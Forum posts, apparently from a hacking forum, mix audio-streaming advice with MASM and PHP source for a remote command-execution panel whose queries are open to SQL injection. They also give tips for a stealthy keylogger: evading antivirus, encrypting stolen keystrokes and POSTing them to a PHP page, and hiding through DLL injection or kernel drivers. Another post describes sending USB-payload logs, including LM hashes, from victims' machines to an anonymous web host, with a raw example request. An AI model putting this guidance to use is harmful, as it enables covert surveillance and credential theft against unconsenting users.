should the user be able to choose any song to listen to? should they be able to not only listen but download the music files as well? if the answer to those is no then I would do streaming audio with winamp. I've done it before with an IceCast server, you make a playlist in winamp and then have it stream through the icecast server... The stream can be played in any thing that plays .m3u files (your live stream) windows media player can play them! I also have a flash player that can connect to the stream as well! ;) this way the user cannot download the files, only hear them in the stream, also they can't change the song. It's like a radio broadcast in a way... There is a way to convert the stream into mp3 files though ex. (streamripper) otherwise if you wanted the user's to be able to download the songs, and choose what they want to listen to, then as moonlit suggested a shared folder will do the trick. What I like to do though is put the music files on a webserver and have a flash based web player play them in like a playlist. Then they can choose any song and it plays right off the web browser... They can also download them (actually if they're listening to it they've already downloaded it its in there browser cache) If you'd want users to be able to listen to any song but NOT download them, then you'd have to make a more complicated flash player, like myspace.com's player for example, you can't download the mp3's unless the artist allows it. Only listen to them, They achieve that by sending a stream instead of the actual mp3 file! but like all streams they can be converted back to mp3 :) but its more secure...

well thanks digital pirate! Anyway today I was thinking about this, and there is something that I didn't like about the previous run.exe! It constantly reads from a text file every minute! Even though the text file is small and there's only 60 reads per hour, it still is extra wear and tear on your hard drive that will add up if running it for hours! Also it kinda sucks to have to wait 1 minute between commands... So I thought of a new idea! This time we will use our beloved sockets! I realized that php CAN use sockets to communicate with other socket apps! I upgraded my MASM32 to version 10 from 9(since a new version was released!) and redid the run.exe It now acts as a server instead of a file reader... You run the server "ExecuteServer.exe" and leave it running. It is now a console app. pressing CTRL + ALT + R will hide/unhide the console window so you dont have to look at it... I also now use WinExec, instead of ShellExecute, Since its more like typing into a command prompt(cmd.exe) than ShellExecute!! I liked your idea about being able to shutdown the computer from the php script! So that contributed to using WinExec as well... You can now execute commands in your system32 folder without providing the full path, WITH PARAMETERS TOO! observe from the image. Files from other paths than system32 can still be executed with params! as I have done so with ghost and it worked... It now also opens and closes your main CD-ROM drive just for fun lol! sending the server "cd -o\r\n" or "cd -c\r\n" opens or closes it... you send the server "exec $command\r\n" to get it to execute a command, its like having a shell to your machine from php :) you add commands and then you can execute them by specifying the id just like previously there is no longer any wait! no more text file, no more 1 minute wait time, its immediate! Since your php script and the server are running on the same machine, the php script connects to localhost! and as long as you don't open any holes in your firewall allowing incoming packets to your server machine on port 22008 it will not be accessible from anything except your password protected php script! ;) (4KB) ExecuteServer.asm: (assembles in MASM32 v10) ;Remote Execute Server 1.0 ;Coded by Steve8x ; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ;standard includes file include \masm32\include\masm32rt.inc ;extra includes used include \masm32\include\wsock32.inc include \masm32\include\winmm.inc includelib \masm32\lib\wsock32.lib includelib \masm32\lib\winmm.lib ; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ comment * ----------------------------------------------------- Build this console app with "MAKEIT.BAT" on the PROJECT menu. ----------------------------------------------------- * clearbuffer PROTO windowhide PROTO .data? servsock SOCKET ? clientsock SOCKET ? sockaddr1 sockaddr_in <> sockaddr2 sockaddr_in <> WSockData WSADATA <> outputhandle dd ? tmp dd ? .data wndtitle db 'Remote Execute Server v1.0 - Steve8x',0 mci1 db 'set cdaudio door open',0 mci2 db 'set cdaudio door closed',0 mci3 db 0 buffer db 512 dup(0) .code start: ; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ invoke GetStdHandle, STD_OUTPUT_HANDLE mov [outputhandle], eax invoke SetConsoleTextAttribute, [outputhandle], BACKGROUND_RED + FOREGROUND_GREEN + FOREGROUND_INTENSITY cls print "Server Started...",13,10 invoke SetConsoleTitleA, addr wndtitle invoke CreateThread, 0, 0, addr windowhide, 0, 0, 0 call main exit ; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ main proc invoke WSAStartup, 0202h, addr WSockData invoke socket, PF_INET, SOCK_STREAM, 0 mov [servsock], eax xor eax, eax mov sockaddr1.sin_family, AF_INET mov sockaddr1.sin_addr, eax invoke htons, 22008 mov sockaddr1.sin_port, ax invoke bind, [servsock], addr sockaddr1, sizeof sockaddr_in .if eax == SOCKET_ERROR invoke OutputDebugString, SADD("SOCKET ERROR: could not bind socket") call WSACleanup xor eax, eax ret .endif invoke listen, [servsock], 1 cls print "Server Active...",13,10,13,10 next_connection: invoke closesocket, [clientsock] mov eax, sizeof sockaddr_in mov [tmp], eax invoke accept, [servsock], addr sockaddr2, addr tmp mov [clientsock], eax ;if it gets here a client is connected next_cmd: mov edi, offset buffer mov eax, sizeof buffer push edi call clearbuffer pop edi recvx: invoke recv, [clientsock], edi, 300, 0 or eax, eax jz next_connection cmp eax, SOCKET_ERROR je next_connection push edi add edi, eax mov al, [edi-1] pop edi cmp al, 10;0x0A/0Ah jne recvx cmp word ptr [edi], "dc";cd je cddrive cmp dword ptr [edi], "cexe";exec je executecmd invalidcommand: ;should never happen if your sending the commands from php correctly print "Client Sent Invalid Command!",13,10 invoke OutputDebugString, SADD("error") jmp next_connection cddrive: invoke SetConsoleTextAttribute, [outputhandle], FOREGROUND_GREEN + FOREGROUND_INTENSITY mov ax, [edi+3]; param in ax either "-o" or "-c" cmp ax, "o-" je opencdrom cmp ax, "c-" jne invalidcommand closecdrom: invoke mciSendString, addr mci2, addr mci3, 0, 0 print "Client Sent:",13,10 print edi,13,10 jmp next_connection opencdrom: invoke mciSendString, addr mci1, addr mci3, 0, 0 print "Client Sent:",13,10 print edi,13,10 jmp next_connection executecmd: invoke SetConsoleTextAttribute, [outputhandle], FOREGROUND_RED + FOREGROUND_INTENSITY invoke lstrlen, addr buffer xor ebx, ebx mov [edi+eax-2], bx;null out the \r\n at the end of the string add edi, 5;get past "exec " invoke WinExec, edi, SW_SHOWNORMAL sub edi, 5 print "Client Sent:",13,10 print edi,13,10,13,10 jmp next_connection shutdownserver: invoke closesocket, [servsock] invoke closesocket, [clientsock] call WSACleanup xor eax, eax ret main endp clearbuffer proc @@: xor edx, edx mov [edi], edx add edi, 4 mov ebx, [edi] test ebx, ebx jnz @b ret clearbuffer endp windowhide proc LOCAL showhide:DWORD LOCAL hWnd:DWORD invoke FindWindow, 0, addr wndtitle mov [hWnd], eax mov [showhide], 1 CheckKeys: invoke Sleep, 10 invoke GetKeyState, VK_CONTROL; CONTROL key and al, 80h cmp al, 0 jz CheckKeys invoke GetKeyState, VK_MENU; ALT key and al, 80h cmp al, 0 jz CheckKeys invoke GetKeyState, 52h; R key and al, 80h cmp al, 0 jz CheckKeys ; If all keys CTRL + ALT + R are simultaneously pressed the execution will reach here xor [showhide], 1 ; 1 = SW_SHOWNORMAL, 0 = SW_HIDE invoke ShowWindow, [hWnd], [showhide]; If showhide == 1 it will show the window, 0 it will hide it;) invoke Sleep, 250; so it wont hide/unhide really quickly, if you don't know what i mean try it without jmp CheckKeys windowhide endp ; ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ end start new config.php <?php $dbhost = 'localhost:3306'; $dbuser = 'root'; $dbpass = 'mypassword'; $dbname = 'remoteexecute'; $Self = $_SERVER['PHP_SELF']; $conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql'); //Create a database to use if it does not exist yet! $query = "CREATE DATABASE IF NOT EXISTS remoteexecute"; $result = mysql_query($query); mysql_select_db($dbname); //Create a table which will hold the name and path to the programs we want to execute $query = "CREATE TABLE IF NOT EXISTS cmds(id INT NOT NULL, name VARCHAR(64) NOT NULL, command VARCHAR(260) NOT NULL, PRIMARY KEY(id))"; mysql_query($query); ?> new index.php (remote control panel) <?php include('config.php'); //Username and password protect this page! //so that only you can access it and run programs remotely on your machine! //change both and don't tell anyone! $username = "username"; $password = "password"; if(isset($_POST['auth'])) // you submitted your login info, so store it in a cookie { $user = $_POST['user']; $pass = $_POST['pword']; $logininfo = "$user-$pass"; setcookie("adminaccess", $logininfo, time()+1200); // 1200 = 20 minutes echo "<meta http-equiv='refresh' content='0;url=$Self'>"; } if(isset($_COOKIE['adminaccess'])) // every time you refresh the page the cookie's expire time will be extended 20 minutes { $logininfo = $_COOKIE['adminaccess']; setcookie("adminaccess", $logininfo, time()+1200); } echo "<html>"; echo "<head>"; echo "<title>Remote Code Execution Through PHP</title>"; echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">"; echo "<center>"; //if no cookie is set, then show the login form if(!isset($_COOKIE['adminaccess'])) { echo "<h1> Admin Login: </h1>"; echo "<p><form method='post' action='$Self'>"; echo "<table border='2' cellspacing='2' cellpadding='0'><tr>"; echo "<td>Username: </td><td> <input name='user' type='text' id='user'> </td> </tr>"; echo "<td>Password: </td><td> <input name='pword' type='password' id='pword'></td></tr> </table>"; echo "<p> <input type='submit' name='auth' id='auth' value='Login'>"; echo "</form>"; die(); } else { //otherwise validate the username and password stored in the cookie! $logininfo = $_COOKIE['adminaccess']; list($usr, $pass) = split('-', $logininfo); //If you enter the wrong username or password you'll have to clear the cookie from your browser //its made that way as an annoyance to deter someone from attempting to guess // HOWEVER they shouldn't know about your page anyway... if($usr != $username) { die("<h1>INVALID CREDENTIALS!!!</h1>"); } if($pass != $password) { die("<h1>INVALID CREDENTIALS!!!</h1>"); } //everything is valid!! continue! if(isset($_POST['add'])) { if(isset($_POST['cmdname']) && isset($_POST['command'])) { //count number of entries + 1 $nextid = 0; $query = "SELECT * FROM cmds"; $result = mysql_query($query); while($row = mysql_fetch_array($result)) { $nextid++; } $nextid++; $cmdname = $_POST['cmdname']; $cmd = $_POST['command']; $query = "INSERT INTO cmds (id, name, command) VALUES ('$nextid', '$cmdname', '$cmd')"; mysql_query($query); echo "<b>Successfully added entry to the database!</b><p>"; } else { echo "<b>Insertion Failed! provide name + path!</b><p>"; } } if(isset($_POST['del'])) { if(isset($_POST['id'])) { $deletebyitemid = $_POST['id']; $query = "DELETE FROM cmds WHERE id = $deletebyitemid"; mysql_query($query); if($deletebyitemid > 0) { //since were deleting an item update the id's after it to minus 1 $query = "UPDATE cmds SET id = id - 1 WHERE id > $deletebyitemid"; mysql_query($query); } echo "<b>Sucessfully removed entry!</b><p>"; } else { echo "<b>Failed to remove entry!</b><p>"; } } if(isset($_POST['exec'])) { if(isset($_POST['id'])) { $id = $_POST['id']; $query = "SELECT * FROM cmds WHERE id = $id"; $result = mysql_query($query); $row = mysql_fetch_array($result); $cmd = $row[2]; $writestring = "exec $cmd\r\n"; // sent to the server which does WinExec(like using cmd.exe) //port 22008 was picked by me, if you wanted to change this //you'd also have to change it on the server and re-assemble it! $sock = fsockopen("127.0.0.1", 22008, $error, $error2); if($sock) { fwrite($sock, $writestring); fclose($sock); echo "<b> Command Has Executed Sucessfully!</b><p>"; } else { echo "<b> ERROR #$error: $error2 </b><p>"; } } } if(isset($_POST['opencd'])) { $writestring = "cd -o\r\n"; // -o means open $sock = fsockopen("127.0.0.1", 22008, $error, $error2); if($sock) { fwrite($sock, $writestring); fclose($sock); echo "<b> Success! </b><p>"; } else { echo "<b> ERROR #$error: $error2 </b><p>"; } } if(isset($_POST['closecd'])) { $writestring = "cd -c\r\n"; // -c means close $sock = fsockopen("127.0.0.1", 22008, $error, $error2); if($sock) { fwrite($sock, $writestring); fclose($sock); echo "<b> Success! </b><p>"; } else { echo "<B> ERROR #$error: $error2 </b><p>"; } } echo "<h1> Remote Execution Control Panel 2.0 </h1>"; echo "<form method='POST' action='$Self'>"; echo "<table border='0' cellpadding='0' cellspacing='4'>"; echo "<tr><td>ID</td><td><input type='text' name='id' size='5'></td></tr>"; echo "<tr><td>Name</td><td><input type='text' name='cmdname'></td></tr>"; echo "<tr><td>Command</td><td><input type='text' name='command' size='50'></td></tr>"; echo "</table><br><input type='submit' name='add' value='Add To List'> "; echo "<input type='submit' name='del' value='Delete From List'> "; echo "<input type='submit' name='exec' value='Execute!'><p> "; echo "<input type='submit' name='opencd' value='Open CDROM!'> <input type='submit' name='closecd' value='Close CDROM!'>"; echo "</form><p>"; $query = "SELECT * FROM cmds"; $result = mysql_query($query); echo "<table border='1' cellspacing='1' cellpadding='1'>"; echo "<tr><th>ID</th><th>Name</th><th>Command</th></tr>"; while($row = mysql_fetch_array($result)) { $id = $row[0]; $name = $row[1]; $cmd = $row[2]; echo "<tr><td>"; echo $id; echo "</td><td>"; echo $name; echo "</td><td>"; echo $cmd; echo "</td></tr>"; } } ExecuteServer source code + binary! you can run it from anywhere unlike before, place the folder somewhere in your masm32 directory if wanting to modify and re-assemble it! http://popeax.com/remoteexecute/ExecuteServer.zip remotecontrol2 php files http://popeax.com/remoteexecute/remotecontrol2.zip and thats about it! let me know if you can think of any more improvements that could be done!

OK, well i like running my apache as a service, so that's out of the question... But thanks for that info, I suspect that you probably are correct! I have found a way around this though! I was at first thinking to create a server app and a client app, and have you run the client app wherever you are and connect to the server to make it run a program, though that would require portforwarding, + the thread starter wanted to control what programs are executed on his server machine THROUGH PHP! So i've done just that! Heres how it works, you run this program your self NOT FROM PHP called "run.exe" from the same folder where a couple php files ive created go... create a new dir on your webserver folder called /remotecontrol/ or something similar but that no one will think of... The run.exe constantly runs on your machine, like httpd.exe... every 1 minute it reads from a file called "runinfo.txt" the first line contains a string number 1, or 0. The next line contains a path to the exe to execute, If the first line is a 1 it executes the file, and re-saves the file with the first line as a zero so that it doesn't keep running the program every minute... If its zero it does nothing... If you don't have a MYSQL database, I recommend getting one as its a nice thing to have! I couldn't imagine having a webserver without a database! My php script uses a database to store, names and paths to programs you want to execute, and you can easily add and remove from the list, with the web front! the ID field is used to delete from the list or execute a program simply type the id into the box and press delete from list or execute button... other fields are ignored for these two actions. The "Name" and "Path" fields are used to add to the list, you can see from the picture what to do! Make sure that paths include \\ double slashes, or no slashes will show up in the table below and it wont work if you try to execute it... The path is limited to MAX_PATH characters, which is 260... So make sure your programs have a path equal to or shorter than that. and thats about it! heres the source code to the Remote Execution Control Panel be sure to change the $username and $password variables at the top, you will use them to login! <?php include('config.php'); //Username and password protect this page! //so that only you can access it and run programs remotely on your machine! //change both and don't tell anyone! $username = "ACBobby"; $password = "ilikephp"; if(isset($_POST['auth'])) // you submitted your login info, so store it in a cookie { $user = $_POST['user']; $pass = $_POST['pword']; $logininfo = "$user-$pass"; setcookie("adminaccess", $logininfo, time()+1200); // 1200 = 20 minutes echo "<meta http-equiv='refresh' content='0;url=$Self'>"; } if(isset($_COOKIE['adminaccess'])) // every time you refresh the page the cookie's expire time will be extended 20 minutes { $logininfo = $_COOKIE['adminaccess']; setcookie("adminaccess", $logininfo, time()+1200); } echo "<html>"; echo "<head>"; echo "<title>Remote Code Execution Through PHP</title>"; echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">"; echo "<center>"; //if no cookie is set, then show the login form if(!isset($_COOKIE['adminaccess'])) { echo "<h1> Admin Login: </h1>"; echo "<p><form method='post' action='$Self'>"; echo "<table border='2' cellspacing='2' cellpadding='0'><tr>"; echo "<td>Username: </td><td> <input name='user' type='text' id='user'> </td> </tr>"; echo "<td>Password: </td><td> <input name='pword' type='password' id='pword'></td></tr> </table>"; echo "<p> <input type='submit' name='auth' id='auth' value='Login'>"; echo "</form>"; die(); } else { //otherwise validate the username and password stored in the cookie! $logininfo = $_COOKIE['adminaccess']; list($usr, $pass) = split('-', $logininfo); //If you enter the wrong username or password you'll have to clear the cookie from your browser //its made that way as an annoyance to deter someone from attempting to guess // HOWEVER they shouldn't know about your page anyway... if($usr != $username) { die("<h1>INVALID CREDENTIALS!!!</h1>"); } if($pass != $password) { die("<h1>INVALID CREDENTIALS!!!</h1>"); } //everything is valid!! continue! if(isset($_POST['add'])) { if(isset($_POST['exename']) && isset($_POST['path'])) { //count number of entries + 1 $nextid = 0; $query = "SELECT * FROM exes"; $result = mysql_query($query); while($row = mysql_fetch_array($result)) { $nextid++; } $nextid++; $exe = $_POST['exename']; $path = $_POST['path']; $query = "INSERT INTO exes (id, name, path) VALUES ('$nextid', '$exe', '$path')"; mysql_query($query); echo "<b>Successfully added entry to the database!</b><p>"; } else { echo "<b>Insertion Failed! provide name + path!</b><p>"; } } if(isset($_POST['del'])) { if(isset($_POST['id'])) { $deletebyitemid = $_POST['id']; $query = "DELETE FROM exes WHERE id = $deletebyitemid"; mysql_query($query); //since were deleting an item update the id's after it to minus 1 $query = "UPDATE exes SET id = id - 1 WHERE id > $deletebyitemid"; mysql_query($query); echo "<b>Sucessfully removed entry!</b><p>"; } else { echo "<b>Failed to remove entry!</b><p>"; } } if(isset($_POST['exec'])) { if(isset($_POST['id'])) { $id = $_POST['id']; $query = "SELECT * FROM exes WHERE id = $id"; $result = mysql_query($query); $row = mysql_fetch_array($result); $path = $row[2]; $writestring = "1\r\n$path"; // '1' means run the program '\r\n' means newline $f = fopen("runinfo.txt", "wb"); fwrite($f, $writestring); fclose($f); echo "<b> Program Will Execute In Approximately 1 Minute!</b><p>"; } } echo "<h1> Remote Execution Control Panel </h1>"; echo "<form method='POST' action='$Self'>"; echo "<table border='0' cellpadding='0' cellspacing='4'>"; echo "<tr><td>ID</td><td><input type='text' name='id' size='5'></td></tr>"; echo "<tr><td>Name</td><td><input type='text' name='exename'></td></tr>"; echo "<tr><td>Path</td><td><input type='text' name='path' size='50'></td></tr>"; echo "</table><br><input type='submit' name='add' value='Add To List'> "; echo "<input type='submit' name='del' value='Delete From List'> "; echo "<input type='submit' name='exec' value='Execute!'> "; echo "</form>"; $query = "SELECT * FROM exes"; $result = mysql_query($query); echo "<table border='1' cellspacing='1' cellpadding='1'>"; echo "<tr><th>ID</th><th>Name</th><th>Path</th></tr>"; while($row = mysql_fetch_array($result)) { $id = $row[0]; $name = $row[1]; $path = $row[2]; echo "<tr><td>"; echo $id; echo "</td><td>"; echo $name; echo "</td><td>"; echo $path; echo "</td></tr>"; } } heres the config.php which you put in the same folder as the other php file and run.exe change the database info to match yours, don't worry about creating a database/schema & table as it does it for you <?php $dbhost = 'localhost:3306'; $dbuser = 'root'; $dbpass = 'ilikephp'; $dbname = 'RemoteExecute'; $Self = $_SERVER['PHP_SELF']; $conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql'); //Create a database to use if it does not exist yet! $query = "CREATE DATABASE IF NOT EXISTS RemoteExecute"; $result = mysql_query($query); mysql_select_db($dbname); //Create a table which will hold the name and path to the programs we want to execute $query = "CREATE TABLE IF NOT EXISTS exes(id INT NOT NULL, name VARCHAR(64) NOT NULL, path VARCHAR(260) NOT NULL, PRIMARY KEY(id))"; mysql_query($query); ?> run.exe source: ; ««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««« .486 ; create 32 bit code .model flat, stdcall ; 32 bit memory model option casemap :none ; case sensitive include \masm32\include\windows.inc include \masm32\include\masm32.inc include \masm32\include\gdi32.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\Comctl32.inc include \masm32\include\comdlg32.inc include \masm32\include\shell32.inc include \masm32\include\oleaut32.inc include \masm32\include\msvcrt.inc includelib \masm32\lib\masm32.lib includelib \masm32\lib\gdi32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\Comctl32.lib includelib \masm32\lib\comdlg32.lib includelib \masm32\lib\shell32.lib includelib \masm32\lib\oleaut32.lib includelib \masm32\lib\msvcrt.lib CheckFile PROTO .data file db 'runinfo.txt',0 op db 'open',0 fhandle dd 0 buffer dd 0 bytesread dd 0 hInstance dd 0 .code start: invoke GetModuleHandle, 0 mov [hInstance], eax InfiniteLoop: call CheckFile invoke Sleep, 60000; sleep for 1 minute then check file again jmp InfiniteLoop CheckFile proc LOCAL byteswritten:DWORD invoke CreateFile, addr file, GENERIC_READ + GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0 mov [fhandle], eax .if eax == INVALID_HANDLE_VALUE; file doesn't exist ret .endif invoke VirtualAlloc, 0, 1000, MEM_COMMIT, PAGE_READWRITE mov [buffer], eax invoke ReadFile, [fhandle], [buffer], 1000, addr bytesread, 0 mov ecx, [buffer] cmp byte ptr [ecx], 31h; 31h = '1' formatted text jne exitfunc add ecx, 3; add 3 to get past the \r\n (newline) so ecx now points to the path string ;we know the file read had a '1' at the first byte so that means we want it to execute invoke ShellExecute, 0, addr op, ecx, 0, 0, SW_SHOWNORMAL mov eax, [buffer] mov byte ptr [eax], 30h; move '0' into the first byte of buffer! we will save over the file ;so we dont keep running the program every minute invoke SetFilePointer, [fhandle], 0, 0, FILE_BEGIN invoke WriteFile, [fhandle], [buffer], 1, addr byteswritten, 0 exitfunc: invoke VirtualFree, [buffer], 0, MEM_RELEASE invoke CloseHandle, [fhandle] ret CheckFile endp end start heres the ready made folder with the already compiled run.exe http://www.popeax.com/remoteexecute/remotecontrol.zip run.exe is only 2.5KB since I used asm ;) You can play around with my web front if you want but I disabled the saving of the text file and am not currently running run.exe so people wont be able to execute programs on my machine! http://www.popeax.com/remoteexecute/ So there you have it, a way to get around the limitation of php's execute functions whatever the reason may be... Although if your want to run an app that does a certain thing and terminates itself then using php's functions will work fine! but if your trying to get a GUI app to actually show up, this is a better option... :)

digital pirate!! have you tried running an GUI exe from php with any of those commands like System() or exec()? At first I thought they weren't working and just making the php script hang! but actually, I took a look at my task manager and found a bunch of calc.exe's running!! (the program i was testing to run) I specified System("start d:\\windows\\system32\\calc.exe"); you need the double slashes because php is like c++ it uses a backslash as an escape character, so putting two results in 1... Why is php weird like that and not showing the GUI window of GUI programs? it runs indeed but it seems as if it doesn't just hide the window but somehow makes it never be created!! I tried unhiding the calculator window with Ghost(my window hider program from the coding section) and it doesn't find the window which leads me to believe it doesn't exist! So i've been trying to figure out a way to actually allow GUI programs to appear! Since you said batch scripts run fine, I thought of the idea of doing a fopen + fwrite and writing a string like this "start d:\\windows\\system32\\calc.exe" to a batch file named "execute.bat" or "execute.cmd" (.cmd is the same as .bat i think) neither worked! well it did run the calc.exe but the window was still not visible, and as far as i know non existant... also cmd.exe seems to run along with the program you made run, and it doesn't exit until you terminate calc.exe with the task manager... also the php script stops hanging and finishes once you end the process... When that didn't work I came up with a new idea... Create a simple program that reads a text file into a memory buffer, and does a shellexecute, executing the program which the path to was contained in the text file... the php script saves a text file with the path to the exe, (without the start) just the path, and then does a System("run.exe")... .data file db 'runinfo.txt',0 op db 'open',0 fhandle dd 0 buffer dd 0 bytesread dd 0 hInstance dd 0 .code start: invoke GetModuleHandle, 0 mov [hInstance], eax invoke CreateFile, addr file, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0 mov [fhandle], eax .if eax == INVALID_HANDLE_VALUE; file doesn't exist invoke ExitProcess, 0 .endif invoke VirtualAlloc, 0, 1000, MEM_COMMIT, PAGE_READWRITE mov [buffer], eax invoke ReadFile, [fhandle], [buffer], 1000, addr bytesread, 0 invoke CloseHandle, [fhandle] ;path to the exe to execute is now loaded into the memory buffer invoke ShellExecute, 0, addr op, [buffer], 0, 0, SW_SHOWNORMAL ;SW_SHOWNORMAL was my attempt at getting the window to show ;since the window doesn't ever exist it doesn't work! invoke ExitProcess, 0 end start Now im getting closer! the run.exe executes fine, reads the file, does the shellexecute, and calc.exe is running... still no window, but cmd.exe no longer runs, and the php script no longer hangs it returns immediately after run.exe terminates itself... Ive enumerated all windows with spy++ and an example app that comes with masm32 and the calculator window does not appear on the list!!! the enumerated windows list shows all windows hidden or visible, so php is somehow preventing windows from appearing! Why would they want to do that? I think I've thought of an alternative way, to get this to work! it involves not using any execute commands from php itself... since php isn't doing the executing im confident the windows will appear... i'll code it and post back in a short while!

I can't watch that crap!! its a bunch of bull$hit propaganda!!! They can never regulate the internet because of its free nature! I'm running a webserver off my computer right now and anyone in the world can connect to it! no matter if they connect with dialup, or satellite, or whatever! The internet is a huge gigantic network of computers! we are all hooked up together! nothing can break that connection, Something so massive is impossible to stop! There's always going to be people like that spreading around rumors and crap trying to get you to believe in them! They have built up an illusion in their own minds as to what is the end all be all of the internet! and you know what? they are full of shit! So don't worry about anything! don't stress over it! SEND YOUR PACKETS PROUDLY! no matter what browser you use, what OS you have, your CPU, RAM, Motherboard or any of that! the electrical signals are going to flow send and receive! And I choose not to receive those particular bits and bytes! that video stream you saw, your browser downloaded those packets, and showed you the video! I closed my connection with that server! If you don't like the content you receive from a particular server you can choose to end the connection! thats what the internet's about! the freedom to connect, download, upload, share, read, write, or otherwise interpret any kind of data you want! If you don't like the content! then you choose not to receive it! no one can force content on you! You can't control peoples electrical impulses! everything is made up of electrical signals through your mind, through your body, through the internet! its electric! So those guys sent you some bad electrical signals! So find some good ones to make up for it! stay positive! positivity creates more positive energy! negativity creates negative energy! ++++++++ If some old gray haired politicians think they can control the "internet" they don't really understand what the internet is themselves! Its bigger then them its bigger then they can ever be! Its like a little tiny small guy trying to tell a giant what to do! the giant wont even notice the guy and accidentally crush him under his shoe! ;) Ignore the negative thinkers! think positive and you'll create a positive world for yourself! here's a video I actually watched! made me laugh ;) lol it mad up for that 10 seconds of bad vibes from that other vid http://www.webcastr.com/videos/humor/techno-chicken.html

well I wont post code but I'll give you a couple tips on making a good one: 1. Catch repeated keystrokes (so for example if you press a key, I'm sure you don't press keys so fast like 10 milliseconds a key usually humans press and release keys in a about 100-200 milliseconds) pausing your get key code for that long isnt a good idea because then you'll miss keys. Instead catch repeated ones and don't put them in your buffer(if the key is released however and pressed again it is logged) 2. Use GetAsyncKeyState() API - keyboard hooks and the like are very detectable, GAKS is by far the best method for a usermode logger, unless your a good kernel programmer I'd stick with this API 3. Don't email your logs, emails are easily picked up by any AV, and will be stopped in there tracks, and the user will be alerted that an email is being sent out and your little home away from home on there machine will be discovered and it'll be all for naught. Same thing kinda don't FTP either! leaving a username and password of anykind is leaving a link to you, you don't want that, avoid the FTPizzle and go with the PHPizzle and MYSQLizzle. Its easy to setup and the best way of retrieving logs found here----> http://hak5.org/forums/index.php?showtopic=9644 4. Never save any log files onto the computer, when the number of characters reaches a certain number in the buffer, or a certain time has passed, encrypt the keystroke buffer(actually you could even encrypt the characters as they are typed for extra security), and POST it to your php page.... any packets going across the pipeline are unreadable and unclear what they are for... Even just a simple encryption will do... once the packet is sent zero the buffer ZeroMemory(buffer, sizeof(buffer)); or memset(buffer, 0, sizeof(buffer)); etc... 5. Come up with a clever way to hide your running code, create some threads in a process thats always running on the computer/ inject a dll into an always running process / hide your running executable using a kernel mode driver / disable Windows File Protection and modify a system process and embed your code within it / many more ways I haven't even thought of yet! LEGAL DISCLAIMER: 6.Never ever install it on any machine that you do not own! respect others privacy and test your software on your own computers! And with that have fun coding! ;)

Why would you need to run an apache webserver from your usb drive? you need to start thinking outside of the box, or in your case the USB DRIVE! Simply use HTTP protocol and post data to a form on some remote website, which you can then do anything desired with the data including SendMail() although I think storage in a database is the better option ;)

OK well I've never used a hacksaw or a switchblade(since I prefer to create my own apps) Anyways from what I've gathered your hack/blade uses gmail to receive the log files... This is bad because your having to leave your EMAIL and PASSWORD on a remote machine... and I know gmail at least back when I made an account requires that you have a cell phone to create an account so its not like you can make that many! I was using FTP at first! for my app, but I still didn't like having to leave a username + password contained within the software! Here is my better, safer, anonymous method of getting your data. One day I was writing a post here on hak5 when it hit me! [CLIENT ON REMOTE MACHINE]->FREE WEBSERVER->PHP->MYSQL DATABASE Think about what I'm doing right now, I'm typing text into a box and when I click the "Post" button the php page that this form data gets submitted to inserts my post into the database... When you have seen my topic and clicked on my post the text I have posted was fetched from database and the HTML code was dynamically created by the php for your viewing pleasure... We(non hak5 admins) have no way knowing the MYSQL database password, and there isn't a reason for us to have it either, we can post data to the database without it... I have created a sample app, which can be modified for your needs... I'm sure you could get it to post your LM hash files or whatever files switch/saw saves to your database! Heres what you need... Find a free web provider which offers PHP and at least 1 MYSQL database also for free! If you can't find one that offers mysql you could run your own MYSQL database server, and find a free host with php and you could still keep your mysql password hidden... Because of the way PHP works, its server sided, you cannot see the php code, only the html code generated by it! THATS IT! Once you've got that setup your ready to receive your data! make the password a good strong password and change the username from root if you can... I had to do a little research on HTTP protocol, and also I used a packet sniffer and attached it to firefox, while I submitted a form on a website... My example program is called "SwiftSubmit" it lets you type up to 8000 characters into the box and once you click submit it sends a packet like this to the host you want it to connect to this is all anyone sniffing packets will see, where its going and other info, but the 'log' data is scrambled! POST /sendmeyourpackets/index.php HTTP/1.1 Host: popeax.com.. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate..Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 connection: keep-alive Referer: http://localhost/pwned.php Content-Type: application/x-www-form-urlencoded Content-Length: 346 